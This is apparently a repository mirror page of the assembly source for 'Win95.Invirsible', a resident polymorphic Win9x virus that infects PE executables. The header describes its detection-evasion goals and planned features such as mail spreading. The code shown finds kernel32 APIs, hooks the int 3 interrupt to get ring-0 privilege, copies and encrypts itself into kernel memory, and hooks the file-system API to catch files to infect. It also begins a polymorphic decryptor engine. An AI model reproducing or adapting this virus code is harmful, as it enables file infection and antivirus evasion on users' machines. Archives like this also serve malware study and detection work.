mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-04 17:35:27 +00:00
4174 lines
94 KiB
NASM
4174 lines
94 KiB
NASM
|
; Win95.Invirsible
|
|||
|
; Bhunji
|
|||
|
;
|
|||
|
; proudly presents ;)
|
|||
|
;
|
|||
|
; Invirsible
|
|||
|
;
|
|||
|
; Virusinfo
|
|||
|
; Version 2
|
|||
|
; Size: Big, usually around 7.6k
|
|||
|
; Infects: PE files
|
|||
|
; Resident: Yes
|
|||
|
; Systems; Win9x
|
|||
|
; Polymorhic: Yes
|
|||
|
|
|||
|
; This is the second version on Invirsible. My goal with this virus
|
|||
|
; is to make it as hard as possible to detect. It has one technique
|
|||
|
; never seen in a virus before which I call the Guide technique. More
|
|||
|
; info about this can be found at www.shadowvx.org. It carries a very
|
|||
|
; advanced generic polymorpher. It is able to polymorph mov, add, sub
|
|||
|
; so far but its trivial to add more instructions. The engine uses
|
|||
|
; emulation to generate code. It is able to emulate memory and registers
|
|||
|
; which results in code that looks very real. Coding new code to be
|
|||
|
; polymorphed is pretty easy as it's similar to Intel asm.
|
|||
|
|
|||
|
; ex. mov RX1,[RX2]
|
|||
|
; mov Random register 1, [Random register 2]
|
|||
|
|
|||
|
; Changes since last version
|
|||
|
; A total rewrite of the polymorphic code. Works way better now.
|
|||
|
; * Changed the polymorphic language to be more similar to Intel asm
|
|||
|
; * Added memory emulation, the created code uses the end of .data segment.
|
|||
|
; * Deleted advanced register emulation, did hardly create better code
|
|||
|
; and was taking up lots of space.
|
|||
|
; * Very generic, adding a new instruction needs 10 lines of data/code
|
|||
|
; instead of 200-400 lines.
|
|||
|
; * An optimiser that deletes the very worst code. (fx. mov eax,eax)
|
|||
|
; * The linked list polymorpher will create a six different looking
|
|||
|
; decryptors for the generic polymorpher.
|
|||
|
|
|||
|
|
|||
|
; Some changes to the virus
|
|||
|
; * Bugfixes. (Doesn't crash on infection :) )
|
|||
|
; * Search for slackspace in .data segment. This space is used by the
|
|||
|
; generated code to look more like real code.
|
|||
|
; * Recompilation of the code before every infection to make the pointers
|
|||
|
; point to the .data slack
|
|||
|
|
|||
|
; Things to be added in the future.
|
|||
|
; * More instructions will be added to the polymorpher
|
|||
|
; * A more powerful optimiser
|
|||
|
; * Infect on NT too.
|
|||
|
; * Spreading by mail
|
|||
|
; * Infection of hlp files
|
|||
|
; * EPO
|
|||
|
; * Deregister the most common AV software on file but register it later in
|
|||
|
; memory. This will not happen if the AV gives the virus its proper name.
|
|||
|
; * A better method of upgrading the virus ala babylonia.
|
|||
|
|
|||
|
; And here is an example of what code the engine is able and has been
|
|||
|
; able to generate.
|
|||
|
|
|||
|
; Version 1
|
|||
|
; Version one is able to emulate/generate
|
|||
|
; add, mov
|
|||
|
s
|
|||
|
; (code is taken from a generated Guide)
|
|||
|
|
|||
|
; mov ecx, 0Ch
|
|||
|
; mov ebx, fs:[ecx] ; get random number
|
|||
|
; mov edx, 0
|
|||
|
; add edx, eax
|
|||
|
; add eax, esi
|
|||
|
; mov edi, 0
|
|||
|
; add edi, 6472DAADh
|
|||
|
; mov eax, 5A97451Fh
|
|||
|
; mov eax, edx
|
|||
|
; add edi, ecx
|
|||
|
; mov ecx, 0
|
|||
|
; add ecx, ebx
|
|||
|
; or ecx, 8
|
|||
|
; xor ebx, ecx ; 'and' ebx,8
|
|||
|
; add edi, 0DCA7B4AAh
|
|||
|
; add edi, 60E4CB5Ch
|
|||
|
; mov edi, ebx
|
|||
|
; add ebx, offset jumptable ; add ebx, offset jumptable
|
|||
|
; jmp dword ptr [ebx]
|
|||
|
|
|||
|
|
|||
|
; patterns
|
|||
|
|
|||
|
; Differences from the trash code
|
|||
|
; fs:[register]
|
|||
|
; or/and register,8
|
|||
|
; jmp [register]
|
|||
|
|
|||
|
; The trashcode
|
|||
|
; very few instructions
|
|||
|
; no memory instructions
|
|||
|
; the same amount of every emulateable instruction (normal code has more
|
|||
|
; movs then adds for example)
|
|||
|
; unnecessary instructions. Ex.
|
|||
|
; mov eax, 5A97451Fh ; this is unnessesary
|
|||
|
; mov eax, edx ; as this overwrites eax again
|
|||
|
|
|||
|
|
|||
|
; Version 2
|
|||
|
; Version two is able to emulate
|
|||
|
; add, sub, mov, and, or, xor and memory
|
|||
|
|
|||
|
; Generates on average more movs then the
|
|||
|
; adds and more adds then the other opcodes.
|
|||
|
; Generates more registers then memory operands and
|
|||
|
; more memory operands then numbers.
|
|||
|
; The end result 'feels' more like regular code.
|
|||
|
; Many many bugfixes. (There are no more bugs i hope)
|
|||
|
|
|||
|
; Code is taken from a generated decryptor
|
|||
|
;
|
|||
|
; mov edx, 8D403766h
|
|||
|
; xor [4030D7], 1A45h ; 1a45 = virussize
|
|||
|
; xor esi, [4030CF]
|
|||
|
; mov [4030CF], ecx
|
|||
|
; mov esi, 45BBA054h
|
|||
|
; add edi, 0CCFC6B5Bh
|
|||
|
; mov ebx, 1A45h ; first "real" instruction
|
|||
|
; mov eax, [4030CF]
|
|||
|
; sub edi, 1A45h
|
|||
|
; or eax, ebx
|
|||
|
; mov edi, 1A45h
|
|||
|
; mov edi, 3
|
|||
|
; add ecx, 3
|
|||
|
; mov edx, [4030BF] ; second
|
|||
|
; add [4030D7], eax
|
|||
|
; mov esi, 3
|
|||
|
|
|||
|
; DecryptLoop:
|
|||
|
; pusha ; will be deleted in future versions
|
|||
|
; mov eax, 1FF5893Dh
|
|||
|
; mov ecx, ebx
|
|||
|
; sub eax, 0E138ABECh
|
|||
|
; add edx, ecx ; third
|
|||
|
; mov esi, ecx
|
|||
|
; mov edi, ebx
|
|||
|
; mov eax, 0D6E7BEF5h
|
|||
|
; mov [4030CF], 5493B89Ch
|
|||
|
; sub ecx, [4030B3]
|
|||
|
; mov eax, 0E138ABECh
|
|||
|
; and [4030D3], ecx
|
|||
|
; or eax, ebx
|
|||
|
; xor [edx], 0E138ABECh ; decrypt code
|
|||
|
; mov [4030D7], 0E138ABECh
|
|||
|
; popa
|
|||
|
; sub ebx, 4 ;
|
|||
|
; jnb DecryptLoop
|
|||
|
; mov dword_0_4030CF, 69472C81h
|
|||
|
; mov ecx, 0F5D970C4h
|
|||
|
; mov edi, 1
|
|||
|
; mov eax, dword_0_4030B7
|
|||
|
; add ecx, 8244076Eh
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; If we put the real code pieces together we get.
|
|||
|
;
|
|||
|
; mov ebx, 1A45h ; VirusSize
|
|||
|
; mov edx, [4030BF] ; Where to start decrypt
|
|||
|
; DecryptLoop:
|
|||
|
; add edx, ecx ; third
|
|||
|
; xor dword ptr [edx], 0E138ABECh ; decrypt code
|
|||
|
; sub ebx, 4 ;
|
|||
|
; jnb DecryptLoop
|
|||
|
|
|||
|
; The third instruction should add "Where to start" with "VirusSize" but
|
|||
|
; as you can see it is added with ecx instead, this is because of the
|
|||
|
; emulation. The engine knows that ecx = ebx = VirusSize so it used ecx
|
|||
|
; instead.
|
|||
|
|
|||
|
; patterns
|
|||
|
|
|||
|
; Differences from the trash code
|
|||
|
; pushad/popad ; easy to delete
|
|||
|
; [Register] ; engine is only able to create [Number]
|
|||
|
; jxx ; Engine isnt able to create jumps yet
|
|||
|
|
|||
|
; The trashcode
|
|||
|
; Still to few instructions, needs push/pop, call, jmp, jxx to look at least
|
|||
|
; something like real code.
|
|||
|
; Memory instructions isn't able to create memory pointers with a register
|
|||
|
; inside, eg [Number+register]. A better compiler will fix this.
|
|||
|
; Still unnecessary instructions. Ex.
|
|||
|
; mov eax, 0D6E7BEF5h ; this is unnessesary
|
|||
|
; ...
|
|||
|
; mov eax, 1FF5893Dh ; as this overwrites eax again
|
|||
|
;
|
|||
|
; Greetings
|
|||
|
; (M)asmodeus. Dropper.exe has generated errors and will be closed by
|
|||
|
; Windows :)))
|
|||
|
; Morphi Hoppas att du f<>r det b<>ttre i helsingborg
|
|||
|
; Prizzy Thanks for helping me with the bug
|
|||
|
; Ruzz Yes, i have FINALY finished it :)
|
|||
|
; Kamaileon. I wish you luck with the windows programming.
|
|||
|
; Clau Hello sister ;)
|
|||
|
; Urgo32 Good luck with your next virus.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
includelib kernel32.lib
|
|||
|
includelib user32.lib
|
|||
|
include c:masmincludewindows.inc
|
|||
|
|
|||
|
|
|||
|
.486
|
|||
|
.model flat, stdcall
|
|||
|
|
|||
|
ExitProcess PROTO ,:DWORD
|
|||
|
MessageBoxA PROTO ,:DWORD,:DWORD,:DWORD,:DWORD
|
|||
|
|
|||
|
|
|||
|
; Primes, used them in the first version for advanced register emulation,
|
|||
|
; might be usefull in the future
|
|||
|
|
|||
|
Prime1 equ 2
|
|||
|
Prime2 equ 3
|
|||
|
Prime3 equ 5
|
|||
|
Prime4 equ 7
|
|||
|
Prime5 equ 11
|
|||
|
Prime6 equ 13
|
|||
|
Prime7 equ 17
|
|||
|
Prime8 equ 19
|
|||
|
Prime9 equ 23
|
|||
|
Prime10 equ 29
|
|||
|
Prime11 equ 31
|
|||
|
Prime12 equ 37
|
|||
|
Prime13 equ 41
|
|||
|
Prime14 equ 43
|
|||
|
Prime15 equ 47
|
|||
|
Prime16 equ 53
|
|||
|
Prime17 equ 59
|
|||
|
Prime18 equ 61
|
|||
|
Prime19 equ 67
|
|||
|
Prime20 equ 71
|
|||
|
Prime21 equ 73
|
|||
|
Prime22 equ 77
|
|||
|
|
|||
|
|
|||
|
.data
|
|||
|
VirusStr db "No crack found",0
|
|||
|
|
|||
|
.code
|
|||
|
ProgramMain:
|
|||
|
|
|||
|
push 0
|
|||
|
call ExitProcess
|
|||
|
|
|||
|
_rsrc segment para public 'DATA' use32
|
|||
|
assume cs:_rsrc
|
|||
|
|
|||
|
|
|||
|
VirusStart:
|
|||
|
Main:
|
|||
|
mov ebx,[esp]
|
|||
|
|
|||
|
push ebp
|
|||
|
call GetDelta
|
|||
|
|
|||
|
GetDelta:
|
|||
|
pop ebp
|
|||
|
sub ebp,offset GetDelta ; address
|
|||
|
|
|||
|
mov [Temp+ebp],ebx ; save offset into kernel
|
|||
|
|
|||
|
.if ebp!=0 ; code that isn't
|
|||
|
; executed in the first
|
|||
|
; version
|
|||
|
|
|||
|
mov eax,[eax] ; polymorphic code will
|
|||
|
mov [InfectedProgramOffset+ebp],eax ; move pointer to
|
|||
|
.endif ; programstart in eax
|
|||
|
|
|||
|
lea eax,BreakPoint1
|
|||
|
lea eax,[ebp+GetDelta] ; move some address to
|
|||
|
mov [PointerToDataSlack+ebp],eax ; PTDS, doesnt matter as
|
|||
|
; long as its a working one
|
|||
|
|
|||
|
; mov eax,fs:[0c]
|
|||
|
db 67h,64h,0a1h,0ch,00h ; get random number
|
|||
|
add [RandomNumber+ebp],eax ; (is not random on NT)
|
|||
|
|
|||
|
call GetAPIFunctions ; Get needed API functions
|
|||
|
|
|||
|
call FixTables ; clean the 'dirty' tables
|
|||
|
; and allocate mem for the
|
|||
|
; polymorpher
|
|||
|
|
|||
|
call CreateGuideAndDecryptor ; Generate the polymorphic
|
|||
|
; code
|
|||
|
|
|||
|
call GetResident ; intercept IFSMgr to get
|
|||
|
; filenames to infect
|
|||
|
|
|||
|
|
|||
|
ReturnToHost:
|
|||
|
|
|||
|
push [MemPtr+ebp] ; free allocated mem used
|
|||
|
call [LocalFree+ebp] ; by polymorpher
|
|||
|
|
|||
|
mov eax,[InfectedProgramOffset+ebp] ; program address
|
|||
|
pop ebp ; restore ebp
|
|||
|
|
|||
|
jmp eax ; jmp to program
|
|||
|
|
|||
|
Topic db "You can not find what you can not see.",0
|
|||
|
db "Invirsible by Bhunji (Shadow VX)",0
|
|||
|
|
|||
|
VSize equ VirusEnd-VirusStart
|
|||
|
VirusSize equ VSize
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; how much stack and mem should the polymorpher use
|
|||
|
|
|||
|
NumberOfOffsets equ 10 ; more size = better code
|
|||
|
; (doesnt matter right now
|
|||
|
; because the engine isnt
|
|||
|
; able to create jumps)
|
|||
|
StackSize equ 100 ; (doesnt matter right now
|
|||
|
; because the engine isnt
|
|||
|
; able to emulate the stack)
|
|||
|
|
|||
|
MemorySize equ 10 ; The more size the better
|
|||
|
; code is produced but makes
|
|||
|
; it harder to find a file to
|
|||
|
; infect
|
|||
|
|
|||
|
|
|||
|
LinesOfTrash equ 3 ; LinesOfTrash is the
|
|||
|
; aproximate numbers of
|
|||
|
; random instructions between
|
|||
|
; every "legal" instruction
|
|||
|
|
|||
|
; LinesOfTrash
|
|||
|
; Fixup instruction
|
|||
|
; LinesOfTrash
|
|||
|
|
|||
|
EndValueFrecuency equ 1 ; the higher the more often
|
|||
|
; is the EndValue chosed
|
|||
|
; the higher the number is
|
|||
|
; the harder is it to detect
|
|||
|
; my looking at one
|
|||
|
; instruction, but its easier
|
|||
|
; to detect by looking at many
|
|||
|
; instructions.
|
|||
|
; 1 is a perfect value
|
|||
|
|
|||
|
MemPtr dd 0 ; ptr to allocated mem
|
|||
|
ReturnAddress dd 0 ; stores the return address
|
|||
|
; in some functions
|
|||
|
|
|||
|
|
|||
|
InfectedProgramOffset dd ProgramMain ; where to jump when
|
|||
|
; done
|
|||
|
|
|||
|
Temp dd 0 ; just a temporary variable
|
|||
|
|
|||
|
; API's the virus uses
|
|||
|
WinFunctions:
|
|||
|
lstrlenStr db "lstrlen",0
|
|||
|
LocalAllocStr db "LocalAlloc",0
|
|||
|
LocalFreeStr db "LocalFree",0
|
|||
|
db 0
|
|||
|
; pointers to these
|
|||
|
Functions:
|
|||
|
lstrlen dd ?
|
|||
|
AllocMem dd ?
|
|||
|
LocalFree dd ?
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
FixTables:
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
lea edi,[ZeroRegStart+ebp]
|
|||
|
mov ecx,(ZeroRegEnd-ZeroRegStart)/4
|
|||
|
xor eax,eax
|
|||
|
rep stosd
|
|||
|
|
|||
|
lea edi,[RandomRegs+ebp]
|
|||
|
mov ecx,Registers
|
|||
|
dec eax
|
|||
|
rep stosd
|
|||
|
|
|||
|
lea edi,[SavedOffsets+ebp]
|
|||
|
mov ecx,NumberOfOffsets
|
|||
|
rep stosd
|
|||
|
|
|||
|
|
|||
|
lea eax,[EaxTable+ebp]
|
|||
|
mov [Tables+ebp],eax
|
|||
|
|
|||
|
mov eax,MemorySize*20+StackSize*20
|
|||
|
|
|||
|
push eax
|
|||
|
push LMEM_FIXED + LMEM_ZEROINIT
|
|||
|
call [AllocMem+ebp]
|
|||
|
mov [Tables+ebp+4],eax
|
|||
|
|
|||
|
add eax,MemorySize*20
|
|||
|
mov [Tables+ebp+8],eax
|
|||
|
|
|||
|
|
|||
|
call UndefineRegistersAndMem
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
lea esi,[Mem1Table+ebp]
|
|||
|
mov edi,[Tables+ebp+4]
|
|||
|
lodsb
|
|||
|
|
|||
|
|
|||
|
mov ecx,eax
|
|||
|
PredefinedMem:
|
|||
|
lodsb
|
|||
|
push edi
|
|||
|
imul eax,eax,20
|
|||
|
lea edi,[edi+eax]
|
|||
|
push ecx
|
|||
|
mov ecx,5
|
|||
|
rep movsd
|
|||
|
pop ecx
|
|||
|
pop edi
|
|||
|
loop PredefinedMem
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
UndefineRegistersAndMem:
|
|||
|
lea edi,[EaxTable+ebp+4*4]
|
|||
|
mov ecx,Registers
|
|||
|
mov eax,Writeable+Undefined
|
|||
|
|
|||
|
SetOpcodeInfo1:
|
|||
|
stosd
|
|||
|
add edi,4*4
|
|||
|
loop SetOpcodeInfo1
|
|||
|
|
|||
|
|
|||
|
mov edi,[Tables+ebp+4]
|
|||
|
add edi,4*4
|
|||
|
mov ecx,MemorySize+StackSize
|
|||
|
mov eax,Writeable+Undefined
|
|||
|
|
|||
|
SetOpcodeInfo2:
|
|||
|
stosd
|
|||
|
add edi,4*4
|
|||
|
loop SetOpcodeInfo2
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
GetModuleHandle dd 0
|
|||
|
GetProcAddress dd 0
|
|||
|
GetProcAddressStr db "GetProcAddress",0
|
|||
|
|
|||
|
GetAPIFunctions:
|
|||
|
mov eax,[Temp+ebp]
|
|||
|
|
|||
|
call GetModuleHandleAndProcAddress
|
|||
|
|
|||
|
mov [GetModuleHandle+ebp],eax
|
|||
|
mov [GetProcAddress+ebp],ebx
|
|||
|
|
|||
|
xor edx,edx
|
|||
|
lea edx,[WinFunctions+ebp]
|
|||
|
xor ecx,ecx
|
|||
|
|
|||
|
CopyWinApiFunctions:
|
|||
|
push edx
|
|||
|
push ecx
|
|||
|
|
|||
|
push edx
|
|||
|
push edx
|
|||
|
push [GetModuleHandle+ebp]
|
|||
|
call [GetProcAddress+ebp]
|
|||
|
|
|||
|
mov ecx,[esp+4]
|
|||
|
mov [Functions+ebp+ecx],eax
|
|||
|
|
|||
|
call [lstrlen+ebp]
|
|||
|
pop ecx
|
|||
|
pop edx
|
|||
|
add edx,eax
|
|||
|
add ecx,4
|
|||
|
inc edx
|
|||
|
|
|||
|
cmp byte ptr [edx],0
|
|||
|
jnz CopyWinApiFunctions
|
|||
|
NoMoreApis:
|
|||
|
ret
|
|||
|
|
|||
|
; Input
|
|||
|
; eax = somewhere in kernel
|
|||
|
|
|||
|
; Returns
|
|||
|
; eax = GetModuleHandler offset
|
|||
|
; ebx = GetProcAddress offset
|
|||
|
|
|||
|
GetModuleHandleAndProcAddress:
|
|||
|
and eax,0fffff000h ; even 1000h something
|
|||
|
|
|||
|
FindKernelEntry:
|
|||
|
sub eax,1000h
|
|||
|
cmp word ptr [eax],'ZM'
|
|||
|
jnz FindKernelEntry
|
|||
|
|
|||
|
|
|||
|
mov ebx,[eax+3ch]
|
|||
|
|
|||
|
cmp word ptr [ebx+eax], 'EP'
|
|||
|
jne FindKernelEntry
|
|||
|
mov ebx,[eax+120+ebx]
|
|||
|
add ebx,eax ; ebx -> Export table
|
|||
|
|
|||
|
mov ecx,[ebx+12] ; ecx -> dll name
|
|||
|
|
|||
|
cmp dword ptr [ecx+eax],'NREK'
|
|||
|
jz FindGetProcAddress
|
|||
|
jmp FindKernelEntry
|
|||
|
|
|||
|
|
|||
|
; We can now be sure that eax points to the kernel
|
|||
|
FindGetProcAddress:
|
|||
|
lea edi,[GetProcAddressStr+ebp]
|
|||
|
|
|||
|
mov edx,[ebx+32]
|
|||
|
|
|||
|
FindFunction:
|
|||
|
add edx,4
|
|||
|
mov ecx,15 ; length of GetProcAddress,0
|
|||
|
mov esi,[edx+eax]
|
|||
|
push edi
|
|||
|
add esi,eax
|
|||
|
repz cmpsb
|
|||
|
pop edi
|
|||
|
jne FindFunction
|
|||
|
|
|||
|
sub edx,[ebx+32]
|
|||
|
shr edx,1 ; ecx = ordinal pointer
|
|||
|
|
|||
|
lea esi,[edx+eax]
|
|||
|
xor ecx,ecx
|
|||
|
add esi,[ebx+36] ; esi = base+ordinals+ordnr
|
|||
|
|
|||
|
mov cx,word ptr [esi] ; ecx = ordinal
|
|||
|
shl ecx,2 ; ecx = ordinal*4
|
|||
|
add ecx,[ebx+28] ; ecx = ordinal*4+func tbl addr
|
|||
|
|
|||
|
mov ebx,[ecx+eax] ; esi = function addr in file
|
|||
|
add ebx,eax ; esi = function addr in mem
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Encryptor dd 0
|
|||
|
|
|||
|
GetResident:
|
|||
|
mov eax,[GetModuleHandle+ebp]
|
|||
|
add eax,6ch
|
|||
|
mov ebx,'.K3Y'
|
|||
|
cmp [eax],ebx
|
|||
|
|
|||
|
jz DontGoRing0
|
|||
|
|
|||
|
sub esp,8
|
|||
|
sidt [esp] ; get interupt table
|
|||
|
|
|||
|
|
|||
|
; hook int 3 to get get ring 0
|
|||
|
mov esi,[esp+2]
|
|||
|
add esi, 3*8 ; pointer to int 3
|
|||
|
mov ebx, [esi+4]
|
|||
|
|
|||
|
mov bx,word ptr [esi] ; ebx = old pointer
|
|||
|
lea eax,[Ring0Code+ebp] ; eax = new pointer
|
|||
|
mov word ptr [esi],ax ; move new pointer to int 3
|
|||
|
shr eax,16
|
|||
|
mov word ptr [esi+6], ax
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
int 3 ; get into ring 0
|
|||
|
popad
|
|||
|
mov [esi],bx ; return old pointer again
|
|||
|
shr ebx,16
|
|||
|
mov [esi+6],bx
|
|||
|
add esp,8
|
|||
|
|
|||
|
DontGoRing0:
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; ---------------------------------------
|
|||
|
; -------------------------------- Ring 0
|
|||
|
; ---------------------------------------
|
|||
|
|
|||
|
|
|||
|
Ring0Code:
|
|||
|
mov eax,[GetModuleHandle+ebp]
|
|||
|
add eax,6ch
|
|||
|
mov ebx,'.K3Y'
|
|||
|
mov [eax],ebx
|
|||
|
mov ebx,[eax+8]
|
|||
|
mov [eax+4],ebx
|
|||
|
|
|||
|
mov eax,[MemoryTable+ebp]
|
|||
|
sub eax,[GuidePos+ebp]
|
|||
|
push eax
|
|||
|
|
|||
|
add eax,(MemorySize+1)*8
|
|||
|
push eax ; push guide + decrypt size
|
|||
|
; + special variables
|
|||
|
add eax,(VirusEnd-VirusStart)*2+20
|
|||
|
|
|||
|
; allocate mem
|
|||
|
push eax
|
|||
|
push R0_AllocMem
|
|||
|
mov edi,ebp
|
|||
|
call vxd
|
|||
|
pop ecx
|
|||
|
test eax,eax
|
|||
|
jz ErrorRing0
|
|||
|
|
|||
|
; Copy guide and decryptor to ring 0 mem
|
|||
|
|
|||
|
pop ecx ; ecx = guide + decrypt size
|
|||
|
; + special variables
|
|||
|
mov esi,[GuidePos+ebp]
|
|||
|
mov edi,eax
|
|||
|
mov ebx,eax
|
|||
|
xchg ebx,[GuidePos+ebp] ; eax = new guide pos
|
|||
|
; ebx = old guide pos
|
|||
|
pop edx ; edx = size of guide+decrypt
|
|||
|
add edx,eax ; edx = new memory pos
|
|||
|
mov [MemoryTable+ebp],edx
|
|||
|
|
|||
|
sub eax,ebx ; difference in mem
|
|||
|
add [DecryptorPos+ebp],eax ; add to get new pos
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
rep movsb ; copy polycode to ring 0
|
|||
|
|
|||
|
mov edi,edx
|
|||
|
mov ecx,(MemorySize+1)*(8/4)
|
|||
|
xor eax,eax
|
|||
|
rep stosd
|
|||
|
|
|||
|
add edx,MemorySize*4+4
|
|||
|
mov [VirtualDataSegment+ebp],edx
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
|
|||
|
mov eax,[VirtualDataSegment+ebp] ; pointer to virtual data
|
|||
|
; segment
|
|||
|
|
|||
|
lea edx,[Mem1Table+ebp]
|
|||
|
movzx ecx,byte ptr [edx] ; how much data does the
|
|||
|
; decryptor and guide need
|
|||
|
; predefined
|
|||
|
inc edx
|
|||
|
|
|||
|
CopyDataToVirtualDataSegment:
|
|||
|
movzx ebx,byte ptr [edx] ; where in datasegment should
|
|||
|
; we write the data
|
|||
|
shl ebx,2
|
|||
|
push dword ptr [edx+1] ; push the data to write
|
|||
|
pop [eax+ebx] ; write it to virtual data seg
|
|||
|
add edx,1+5*4 ; point to next data block
|
|||
|
loop CopyDataToVirtualDataSegment
|
|||
|
|
|||
|
popad
|
|||
|
|
|||
|
mov [VirusInRing0Mem+ebp],edi
|
|||
|
mov ebx,edi
|
|||
|
|
|||
|
lea esi, [ebp+VirusStart]
|
|||
|
mov ecx, VirusSize
|
|||
|
rep movsb ; copy virus to ring 0
|
|||
|
xor eax,eax
|
|||
|
|
|||
|
stosd
|
|||
|
stosd
|
|||
|
|
|||
|
; encrypt virus in memory
|
|||
|
pushad
|
|||
|
mov esi,[Encryptor+ebp]
|
|||
|
push ebx ; pointer to virus in ring0
|
|||
|
mov eax,esp
|
|||
|
push eax ; pointer to pointer
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
mov [PointerToDataSlack+ebp],esp ; all special variables
|
|||
|
; points to pointer to
|
|||
|
; virus in ring 0
|
|||
|
call Compile
|
|||
|
|
|||
|
call esi
|
|||
|
|
|||
|
add esp,5*4
|
|||
|
|
|||
|
popad
|
|||
|
|
|||
|
; copy residentcode to mem
|
|||
|
push edi
|
|||
|
|
|||
|
lea esi, [ebp+ResidentcodeStart]
|
|||
|
mov ecx, ResidentcodeEnd-ResidentcodeStart
|
|||
|
rep movsb
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; hook API function
|
|||
|
; edi is on stack
|
|||
|
push InstallFileSystemAPIhook
|
|||
|
mov edi,ebp
|
|||
|
call vxd
|
|||
|
|
|||
|
|
|||
|
pop edi ; 0 edi left on stack
|
|||
|
sub edi,ResidentcodeStart
|
|||
|
mov [edi+BasePtr+1],edi
|
|||
|
mov [edi+OldAPIFunction],eax
|
|||
|
BreakPoint1:
|
|||
|
|
|||
|
lea eax,[edi+BreakPoint]
|
|||
|
lea eax,[edi+BreakPoint]
|
|||
|
iretd
|
|||
|
|
|||
|
ErrorRing0:
|
|||
|
pop eax
|
|||
|
xor eax,eax
|
|||
|
iretd
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
CreateGuideAndDecryptor:
|
|||
|
push 1024*1024
|
|||
|
push LMEM_FIXED + LMEM_ZEROINIT
|
|||
|
call [AllocMem+ebp]
|
|||
|
|
|||
|
mov [MemPtr+ebp],eax
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov edi,eax
|
|||
|
lea esi,[Guide+ebp]
|
|||
|
|
|||
|
call LinkedListPolymorpher
|
|||
|
call Polymorph ; create Guide
|
|||
|
|
|||
|
mov [GuidePos+ebp],esi
|
|||
|
mov [GuideSize+ebp],eax
|
|||
|
|
|||
|
add edi,32
|
|||
|
|
|||
|
lea esi,[Decryptor+ebp]
|
|||
|
|
|||
|
call LinkedListPolymorpher
|
|||
|
push esi
|
|||
|
|
|||
|
call Polymorph ; create Decryptor
|
|||
|
|
|||
|
mov [DecryptorPos+ebp],esi
|
|||
|
mov [MemoryTable+ebp],edi
|
|||
|
|
|||
|
mov [DecryptorSize+ebp],eax
|
|||
|
|
|||
|
|
|||
|
call UndefineRegistersAndMem
|
|||
|
|
|||
|
mov [HowMuchTrash+ebp],0
|
|||
|
pop esi
|
|||
|
|
|||
|
pushad
|
|||
|
mov edi,esi
|
|||
|
mov eax,Op_trash
|
|||
|
bswap eax
|
|||
|
xor ecx,ecx
|
|||
|
xor edx,edx
|
|||
|
FindTrashInstruction:
|
|||
|
inc edi
|
|||
|
cmp [edi],edx
|
|||
|
jz EndOfTrashInstructions
|
|||
|
xor ecx,ecx
|
|||
|
cmp [edi],eax
|
|||
|
jnz FindTrashInstruction
|
|||
|
add edi,4
|
|||
|
push eax
|
|||
|
xor eax,eax
|
|||
|
stosb
|
|||
|
pop eax
|
|||
|
jmp FindTrashInstruction
|
|||
|
|
|||
|
EndOfTrashInstructions:
|
|||
|
test ecx,ecx
|
|||
|
jnz ReallyEnd
|
|||
|
inc ecx
|
|||
|
add edi,3
|
|||
|
jmp FindTrashInstruction
|
|||
|
|
|||
|
ReallyEnd:
|
|||
|
popad
|
|||
|
add edi,eax
|
|||
|
call MutateCode ; Generic polymorphing
|
|||
|
|
|||
|
mov ecx,edi
|
|||
|
sub ecx,esi
|
|||
|
shr ecx,1
|
|||
|
mov edi,esi
|
|||
|
|
|||
|
FindDecryptInstruction:
|
|||
|
mov eax,'R['
|
|||
|
repnz scasw ; find [R
|
|||
|
inc edi
|
|||
|
mov ax,word ptr [edi]
|
|||
|
cmp eax,',]' ; is this [Rx],
|
|||
|
jnz FindDecryptInstruction ; if not, continue looking
|
|||
|
|
|||
|
and edi,0fffffff0h
|
|||
|
mov eax,[edi]
|
|||
|
bswap eax
|
|||
|
|
|||
|
.if eax==Op_xor
|
|||
|
jmp CompileEncryptor
|
|||
|
|
|||
|
.elseif eax==Op_add
|
|||
|
mov eax,Op_sub
|
|||
|
bswap eax
|
|||
|
stosd
|
|||
|
jmp CompileEncryptor
|
|||
|
.else
|
|||
|
mov eax,Op_add
|
|||
|
bswap eax
|
|||
|
stosd
|
|||
|
jmp CompileEncryptor
|
|||
|
.endif
|
|||
|
|
|||
|
|
|||
|
CompileEncryptor:
|
|||
|
mov [Encryptor+ebp],esi
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; ---------------------------------------------------
|
|||
|
; --------------------------- The generic polymorpher
|
|||
|
; ---------------------------------------------------
|
|||
|
|
